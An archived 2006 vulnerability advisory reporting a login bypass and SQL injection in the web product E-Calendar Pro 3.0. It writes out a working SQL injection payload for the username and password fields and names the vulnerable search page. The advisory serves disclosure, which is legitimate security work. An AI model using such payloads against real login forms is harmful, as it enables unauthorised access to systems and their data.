OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
E-Calendar Pro 3.0 [ login bypass & injection sql (post)]

saps.auditgmail.com
Date: Wed Nov 15 2006 - 11:05:48 CST


vendor site:http://www.futuretec-soft.com/
product:E-Calendar Pro 3.0
bug:login bypass & injection sql post
risk:high

login bypass :
username: 'or''='
passwd: 'or''='

injection sql post:
in : /search.asp
post your query into the search engine .

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.auditgmail.com